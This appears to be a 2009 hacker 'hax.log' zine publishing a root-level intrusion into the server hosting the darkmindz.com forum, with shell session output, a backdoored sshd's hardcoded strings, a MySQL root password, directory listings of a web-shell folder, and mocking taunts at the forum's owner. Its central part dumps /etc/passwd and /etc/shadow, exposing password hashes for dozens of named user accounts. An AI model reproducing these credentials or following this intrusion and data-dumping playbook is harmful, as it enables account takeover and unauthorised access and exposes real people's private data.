- eth0:10 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.202 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:11 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.203 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:12 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.204 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:13 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.205 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:14 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.206 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth1 Link encap:Ethernet HWaddr 00:50:04:6F:DA:43
- BROADCAST MULTICAST MTU:1500 Metric:1
- RX packets:0 errors:0 dropped:0 overruns:0 frame:0
- TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
- Interrupt:217 Base address:0x8000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
- TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1453567506 (1.3 GiB) TX bytes:1453567506 (1.3 GiB)
- sit0 Link encap:IPv6-in-IPv4
- NOARP MTU:1480 Metric:1
- RX packets:0 errors:0 dropped:0 overruns:0 frame:0
- TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
- root@server [/var/run]#
- root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
- Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
- Rhosts authentication refused for %.100s: bad modes for %.200s
- Server has been configured to ignore %.100s.
- Accepted host %s ip %s client_user %s server_user %s
- HOOKIN: %s:%s
- DlE46Y8KpH
- root@server [/var/run]#
- root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
- check_key_in_hostfiles: key %s for %s
- auth1.c
- sending challenge '%s'
- ruser %.100s
- do_authloop: BN_new failed
- 0x3aownt
- root@server [~]# cat .my.cnf
- [client]
- user="root"
- pass=",a5.z_censored_"
- root@server [~]#
- root@server [/tmp]# cd /var/run/
- root@server [/var/run]# ls
- ./ couriersslcache dbus/ mdmpd/ pm/ saslauthd/ tailwatchd.pid
- ../ cpanellogd.pid eximstats/ messagebus.pid pop3d.pid screen/ upcp.pid
- acpid.socket= cpdavd.pid ftpd.sock= named/ pop3d.pid.lock sdp= utmp
- audispd_events= cphulkd_detector.pid haldaemon.pid named.pid@ pop3d-ssl.pid setrans/ winbindd/
- auditd.pid cphulkd_processor.pid imapd.pid netreport/ pop3d-ssl.pid.lock setroubleshoot/ wpa_supplicant/
- autofs.fifo-misc| cphulkd.sock= imapd.pid.lock NetworkManager/ ppp/ spamd.pid
- autofs.fifo-net| cpsrvd.pid imapd-ssl.pid nscd/ pure-authd.pid sshd.pid
- avahi-daemon/ crond.pid imapd-ssl.pid.lock pcscd.comm= pure-ftpd/ ssh.old
- chkservd/ cups/ klogd.pid pcscd.pid pure-ftpd.pid sudo/
- console/ cupsd.pid mdadm/ pcscd.pub rpc.statd.pid syslogd.pid
- root@server [/var/run]# cd screen/
- root@server [/var/run/screen]# ls
- ./ ../ S-root/
- root@server [/var/run/screen]# cd S-root/
- root@server [/var/run/screen/S-root]# ls
- ./ ../ 13472.pts-0.server|
- root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
- root@server [/var/run/screen/S-root]# ls
- ./ ../ 13472.pts-0.server|
- root@server [/var/run/screen/S-root]# cd ..
- root@server [/var/run/screen]# ls
- ./ ../ S-root/
- root@server [/var/run/screen]# ps -aux | grep -r screen
- Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
- root 25085 0.0 0.0 3920 700 pts/1 S+ 11:27 0:00 grep -r screen
- root@server [/var/run/screen]# ps -aux | grep -i screen
- Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
- root 13472 0.0 0.0 5056 1064 ? Ss Jun10 0:00 SCREEN
- root 25147 0.0 0.0 3920 680 pts/1 R+ 11:27 0:00 grep -i screen
- root@server [/var/run/screen]#
- _______ ________________
- \ _ \ ___ __\ _ \______ \
- / /_\ \\ \/ / /_\ \ / /
- \ \_/ \> <\ \_/ \/ /
- \_____ /__/\_ \\_____ /____/
- \/ \/ \/
- .___ __ .__ .___
- __| _/____ _______| | __ _____ |__| ____ __| _/_______
- / __ |\__ \\_ __ \ |/ // \| |/ \ / __ |\___ / ______
- / /_/ | / __ \| | \/ <| Y Y \ | | \/ /_/ | / / /_____/
- \____ |(____ /__| |__|_ \__|_| /__|___| /\____ |/_____ \
- \/ \/ \/ \/ \/ \/ \/
- ____________ .________
- _________/ ____\ _ \ | ____/
- \___ /\ __\/ /_\ \ |____ \
- / / | | \ \_/ \/ \
- /_____ \ |__| \_____ /______ /
- \/ \/ \/
- |
- \ / _\/_
- darkmindz .-'-. //o\ _\/_
- -- / \ -- | /o\\
- ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
- We eat the night, we drink the time |
- Make our dreams come true
- And hungry eyes are passing by
- On streets we call the zoo
- Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
- the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
- decided to kill his site and handle because he was sloppy & cocky enough to link
- his anti-sec activities with his public internet "life". This has spared us the
- trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
- We didn't want a good hax.log to go to waste so we decided to publish darkmindz
- anyways.
- RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
- that, but who the fuck is/was ssanz anyway and what's the point of spreading
- anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
- and run some retarded haxor forum at the same time pal, good to see that you
- realized that. But in any case if you decide to put your shitty forum online
- again, you will be rm'ed.
- Here's what we found in darkmindz land.
- root@www.darkmindz.com's password:
- Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
- ALERT! You are entering a secured area! Your IP and login information
- have been recorded. System administration has been notified.
- This system is restricted to authorized access only. All activities on
- this system are recorded and logged. Unauthorized access will be fully
- investigated and reported to the appropriate law enforcement agencies.
- root@server2:~[root@server2 ~]# uname -a; id
- Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
- 2009 x86_64 x86_64 x86_64 GNU/Linux
- uid=0(root) gid=0(root)
- groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
- root@server2:~[root@server2 ~]# #who up in this mother fucker
- root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- pcap:x:77:77::/var/arpwatch:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- rpm:x:37:37::/var/lib/rpm:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- named:x:25:25:Named:/var/named:/sbin/nologin
- apache:x:100:500::/var/www:/bin/false
- diradmin:x:101:101::/usr/local/directadmin:/bin/bash
- mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
- webapps:x:500:501::/var/www/html:/bin/bash
- majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- dovecot:x:104:104::/home/dovecot:/bin/bash
- admin:x:501:502::/home/admin:/bin/bash
- hrdev:x:502:503::/home/hrdev:/bin/false
- keytraderz:x:504:505::/home/keytraderz:/bin/false
- yourkicks:x:507:508::/home/yourkicks:/bin/false
- aaa:x:508:509::/home/aaa:/bin/false
- beyond:x:509:510::/home/beyond:/bin/false
- hotglow:x:510:511::/home/hotglow:/bin/false
- wheelglow:x:512:513::/home/wheelglow:/bin/false
- penguin:x:513:514::/home/penguin:/bin/false
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- furiogamin:x:516:517::/home/furiogamin:/bin/false
- kaza:x:517:518::/home/kaza:/bin/false
- pimpinjg:x:518:519::/home/pimpinjg:/bin/false
- dakilla:x:521:522::/home/dakilla:/bin/false
- bootroot:x:522:523::/home/bootroot:/bin/false
- scraft758:x:525:526::/home/scraft758:/bin/false
- hstrike:x:526:527::/home/hstrike:/bin/false
- romeo:x:528:529::/home/romeo:/bin/false
- xckx:x:529:530::/home/xckx:/bin/false
- h3mod:x:530:531::/home/h3mod:/bin/false
- clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
- avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
- hbxmike:x:535:536::/home/hbxmike:/bin/false
- wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
- haiobr:x:537:538::/home/haiobr:/bin/false
- odin:x:538:539::/home/odin:/bin/false
- sam:x:539:540::/home/sam:/bin/false
- mrgod:x:540:541::/home/mrgod:/bin/false
- pagewiz:x:541:542::/home/pagewiz:/bin/false
- zer0:x:542:543::/home/zer0:/bin/false
- dablitz:x:543:544::/home/dablitz:/bin/false
- ristop:x:544:545::/home/ristop:/bin/false
- bloo:x:545:546::/home/bloo:/bin/false
- root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
- bin:*:14253:0:99999:7:::
- daemon:*:14253:0:99999:7:::
- shutdown:*:14253:0:99999:7:::
- halt:*:14253:0:99999:7:::
- mail:*:14253:0:99999:7:::
- ftp:*:14253:0:99999:7:::
- nobody:*:14253:0:99999:7:::
- dbus:!!:14253:0:99999:7:::
- nscd:!!:14253:0:99999:7:::
- vcsa:!!:14253:0:99999:7:::
- rpc:!!:14253:0:99999:7:::
- sshd:!!:14253:0:99999:7:::
- pcap:!!:14253:0:99999:7:::
- mailnull:!!:14253:0:99999:7:::
- smmsp:!!:14253:0:99999:7:::
- rpcuser:!!:14253:0:99999:7:::
- nfsnobody:!!:14253:0:99999:7:::
- rpm:!!:14253:0:99999:7:::
- haldaemon:!!:14253:0:99999:7:::
- named:!!:14257::::::
- apache:!!:14257::::::
- diradmin:!!:14256::::::
- mysql:!!:14256::::::
- webapps:!!:14256:0:99999:7:::
- majordomo:!!:14256::::::
- dovecot:!!:14256::::::
- admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
- hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
- keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
- yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
- aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
- beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
- hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
- wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
- penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
- ntp:!!:14273::::::
- furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
- kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
- pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
- dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
- bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
- scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
- hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
- romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
- xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
- h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
- clamav:!!:14336:0:99999:7:::
- avahi:!!:14336::::::
- avahi-autoipd:!!:14336::::::
- hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
- wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
- haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
- odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
- sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
- mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
- pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
- zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
- dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
- ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
- bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
- root@server2:~[root@server2 ~]# grep romeo /etc/shadow
- romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
- root@server2:~[root@server2 ~]# w
- 04:05:41 up 18:48, 1 user, load average: 0.34, 0.34, 0.23
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- root pts/0 cpe-76-1x5-xx-xx 03:39 26:24 0.00s 0.00s -bash
- root@server2:~[root@server2 ~]# ls -al
- total 30488
- drwxr-x--- 11 root root 4096 May 23 02:47 .
- drwx--x--x 25 root root 4096 May 22 09:26 ..
- -rw------- 1 root root 1132 Mar 11 01:44 anaconda-ks.cfg
- -rw-r--r-- 1 root root 0 May 20 17:26 authorized_keys2
- -rwxr-xr-x 1 root root 10 May 23 03:02 .bash_history
- -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
- drwxrwxrwx 24 1000 1000 4096 Apr 28 14:55 clamav-0.95.1
- -rw-r--r-- 1 root root 24260964 Apr 8 08:24 clamav-0.95.1.tar.gz
- -rw-r--r-- 1 root root 171053 May 22 13:49 cleaned_shells_php.txt
- drwxr-xr-x 4 root root 4096 Mar 18 00:50 .cpan
- -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
- -rw-r--r-- 1 root root 4 Jan 12 16:21 .custombuild
- -rwxr-xr-x 1 root root 21171 Jan 13 14:13 da.cpanel.import.pl
- -rw-r--r-- 1 root root 288 Mar 31 05:21 defaults.conf
- drwxr-xr-x 2 root root 4096 Mar 23 19:03 export
- -rw-r--r-- 1 root root 1155 May 15 22:15 f.c
- drwxr-xr-x 3 root root 4096 May 12 20:35 forum
- -rw-r--r-- 1 root root 265 May 14 15:19 ifconfig
- drwxr-xr-x 2 root root 4096 Mar 23 19:03 import
- -rw------- 1 root root 12288 Mar 27 04:26 .import.swp
- -rw-r--r-- 1 root root 1724 Apr 1 18:53 initsec
- -rw------- 1 root root 97 May 23 04:02 .lesshst
- -rw-r--r-- 1 root root 27 May 23 02:35 load
- -rw------- 1 root root 42 Feb 5 17:18 .my.cnf
- -rw------- 1 root root 37 May 2 15:19 .mysql_history
- -rw-r--r-- 1 root root 9 Mar 31 05:21 .mytop
- drwxr-xr-x 16 webapps apache 4096 Apr 28 16:11 nmap-4.85BETA8
- -rw-r--r-- 1 root root 6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
- drwxr-xr-x 3 root root 4096 May 20 14:31 qurantine
- -rw------- 1 root root 1024 Apr 2 18:01 .rnd
- -rwxr-xr-x 1 root root 2024 Apr 28 14:44 scan.pl
- drwx------ 2 root root 4096 May 20 15:00 .ssh
- -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
- -rw------- 1 root root 12288 May 23 03:02 .test.swp
- drwxr-xr-x 2 root root 4096 May 14 14:00 tmp
- -rwxr-xr-x 1 root root 47429 May 16 2008 tuning-primer.sh
- root@server2:~[root@server2 ~]# cat .bash_history
- exit
- exit
- root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
- root@server2:~[root@server2 ~]# date
- Sat May 23 04:06:57 PDT 2009
- root@server2:~[root@server2 ~]# cd /home/romeo/
- root@server2:/home/romeo[root@server2 romeo]# ls -al
- total 44
- drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 .
- drwx--x--x 36 root root 4096 May 23 02:33 ..
- drwx------ 2 romeo romeo 4096 Feb 17 16:07 backups
- -rw-r--r-- 1 romeo romeo 33 Dec 22 09:57 .bash_logout
- -rw-r--r-- 1 romeo romeo 176 Dec 22 09:57 .bash_profile
- -rw-r--r-- 1 romeo romeo 124 Dec 22 09:57 .bashrc
- -rw------- 1 romeo romeo 0 Feb 8 08:45 .clipboard.txt
- drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 domains
- drwxrwx--- 4 romeo mail 4096 Feb 17 16:07 imap
- drwxrwx--- 5 romeo mail 4096 Dec 23 08:29 Maildir
- lrwxrwxrwx 1 romeo romeo 35 Feb 17 16:07 public_html ->
- ./domains/darkmindz.com/public_html
- -rw-r----- 1 romeo mail 34 Apr 19 16:26 .shadow
- root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
- 4.0K Maildir/tmp
- 68M Maildir/new
- 4.0K Maildir/cur
- 68M Maildir/
- 68M total
- root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
- root@server2:/home/romeo[root@server2 romeo]# cd domains
- root@server2:/home/romeo/domains[root@server2 domains]# ls -la
- total 16
- drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
- drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
- drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
- root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
- root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
- -la
- total 40
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 .
- drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 ..
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 .htpasswd
- drwxr-xr-x 2 root root 4096 May 23 00:10 logs
- drwx--x--x 3 romeo romeo 4096 Dec 22 09:57 public_ftp
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 public_html
- drwxr-xr-x 2 root root 4096 May 1 00:10 stats
- -rw-r--r-- 1 romeo romeo 12151 Feb 9 09:01 view_topic.php
- root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
- public_html/
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# ls -al
- total 47264
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
- -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
- -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
- -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
- drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
- drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
- -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
- -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
- -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
- -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
- -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
- -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
- -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
- -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
- -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
- -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
- -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
- drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
- -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
- -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
- drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
- -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
- -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
- -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
- -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
- -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
- drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
- -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
- -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
- -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
- -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
- -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
- -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
- -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
- -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
- drwxr-xr-x 2 root root 4096 May 20 14:30 shell
- -rw-r--r-- 1 romeo romeo 46487316 May 23 04:07 stress_test.txt
- -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
- drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
- -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
- -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
- -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
- -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
- -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
- -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
- -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
- -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
- -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# ls -la scripts/
- total 476
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 .
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
- -rw-r--r-- 1 romeo romeo 4770 Jan 13 12:11 builder.js
- -rw-r--r-- 1 romeo romeo 588 Jan 13 12:11 cli.js
- -rw-r--r-- 1 romeo romeo 35851 Jan 13 12:12 controls.js
- -rw-r--r-- 1 romeo romeo 35253 Jan 13 12:11 dragdrop.js
- -rw-r--r-- 1 romeo romeo 38986 Jan 13 12:12 effects.js
- -rw-r--r-- 1 romeo romeo 8663 Feb 14 12:40 functions.js
- -rw-r--r-- 1 romeo romeo 6897 Jan 13 12:11 growl.js
- -rw-r--r-- 1 romeo romeo 63854 Jan 13 12:11 lightwindow.js
- -rw-r--r-- 1 romeo romeo 52665 Jan 13 12:12 php.min.js
- -rw-r--r-- 1 romeo romeo 1457 Jan 13 12:11 pm.js
- -rw-r--r-- 1 romeo romeo 1637 Jan 13 12:11 pngfix.js
- -rw-r--r-- 1 romeo romeo 3261 Jan 13 12:11 proto.menu.js
- -rw-r--r-- 1 romeo romeo 130380 Jan 13 12:12 prototype.js
- -rw-r--r-- 1 romeo romeo 2733 Jan 13 12:11 register.js
- -rw-r--r-- 1 romeo romeo 2711 Jan 13 12:11 scriptaculous.js
- -rw-r--r-- 1 romeo romeo 121 Jan 13 12:11 shoutbox.js
- -rw-r--r-- 1 romeo romeo 10296 Jan 13 12:12 slider.js
- -rw-r--r-- 1 romeo romeo 1920 Jan 13 12:12 sound.js
- -rw-r--r-- 1 romeo romeo 20197 Jan 13 12:12 unittest.js
- -rw-r--r-- 1 romeo romeo 6145 Feb 14 12:40 user.php
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# ls -la shell/
- total 1564
- drwxr-xr-x 2 root root 4096 May 20 14:30 .
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
- -rw-r--r-- 1 romeo romeo 1297 Feb 16 21:05 ajan.txt
- -rw-r--r-- 1 romeo romeo 44210 Feb 16 21:06 b64.txt
- -rw-r--r-- 1 romeo romeo 140 Feb 16 21:06 backdoor.txt
- -rw-r--r-- 1 romeo romeo 11141 Feb 16 21:06 c101.txt
- -rw-r--r-- 1 romeo romeo 1468 Feb 16 21:06 cmd.txt
- -rw-r--r-- 1 romeo romeo 18519 Feb 16 21:06 codeanalyzer.txt
- -rw-r--r-- 1 romeo romeo 114861 Feb 16 21:06 constance.txt
- -rw-r--r-- 1 romeo romeo 40682 Feb 16 21:06 CrystalShell v.1.txt
- -rw-r--r-- 1 romeo romeo 83029 Feb 16 21:06 CyberSpy5.txt
- -rw-r--r-- 1 romeo romeo 43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
- -rw-r--r-- 1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
- -rw-r--r-- 1 romeo romeo 39433 Feb 16 21:06 eko.txt
- -rw-r--r-- 1 romeo romeo 38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
- -rw-r--r-- 1 romeo romeo 24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
- PRiV8.txt
- -rw-r--r-- 1 romeo romeo 2089 Feb 16 21:06 imageshell.JPG
- -rw-r--r-- 1 romeo romeo 1768 Feb 16 21:06 index.php
- -rw-r--r-- 1 romeo romeo 17440 Feb 16 21:06 kscript.txt
- -rw-r--r-- 1 romeo romeo 2342 Feb 16 21:06 l0ger.txt
- -rw-r--r-- 1 romeo romeo 1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
- -rw-r--r-- 1 romeo romeo 33796 Feb 16 21:06 Mysql interface v1.0.txt
- -rw-r--r-- 1 romeo romeo 34398 Feb 16 21:06 mysql.txt
- -rw-r--r-- 1 romeo romeo 38856 Feb 16 21:06 ntdaddy.txt
- -rw-r--r-- 1 romeo romeo 124953 Feb 16 21:06 r57.txt
- -rw-r--r-- 1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
